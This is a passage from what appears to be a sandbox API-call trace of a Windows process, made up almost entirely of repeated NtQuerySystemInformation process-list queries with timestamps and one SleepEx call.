ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.451] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0237.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0237.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.048] NtQuerySystemInformation (in: 